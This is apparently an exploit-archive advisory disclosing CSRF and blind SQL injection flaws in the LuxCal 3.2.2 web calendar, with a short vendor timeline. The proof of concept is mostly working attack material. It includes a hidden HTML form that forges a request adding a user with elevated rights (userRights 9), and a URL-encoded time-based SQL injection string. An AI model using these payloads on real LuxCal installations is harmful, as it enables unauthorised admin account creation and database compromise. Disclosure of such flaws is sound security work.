LuxCal 3.2.2 Cross Site Request Forgery / SQL Injection

Risk: Medium
Local: No
Remote: Yes

[+] Author: TUNISIAN CYBER [+] Exploit Title: LuxCal v3.2.2 CSRF/Blind SQL Injection Vulnerabilities [+] Date: 09-03-2014 [+] Category: WebApp [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-352/CWE-89 [+] Vendor: [+] Friendly Sites:, [+] Twitter: @TCYB3R 1.OVERVIEW: LuxCal v3.2.2 suffers from a CSRF and Blind SQL Injection Vulnerabilities. 2.Version: 3.2.2 3.Background: LuxCal is an innovative web based event calendar for home use and small businesses. It is easy to setup and allows easy and fast management of your calendar events at home, in the office, on business trips or when on holiday. LuxCal is feature rich, has been designed for user-friendliness and will help you to make error-free data inputs. The user interface colors are easy to customize. LuxCal is free "open source" software released under the GNU General Public License 4.Proof Of Concept: CSRF: <html> <form method="POST" name="form0" action=""> <input type="hidden" name="uname" value="tcyber"/> <input type="hidden" name="email" value="g4k@hot.mail"/> <input type="hidden" name="new_pw" value="123456"/> <input type="hidden" name="userRights" value="9"/> <input type='submit' name='addExe' value="Add Profile"> </form> </html> Blind SQL Ijnection:*%27%2b(select(0)from(select(sleep(0)))v)%2b%27%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ "SQL error. See 'logs/mysql.log'" 5.Solution(s): no contact from vendor 6.TIME-LINE: 2014-07-03: Vulnerability was discovered. 2014-07-03: Contact with vendor. 2014-08-03: No reply. 2014-09-03: No reply. 2014-09-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top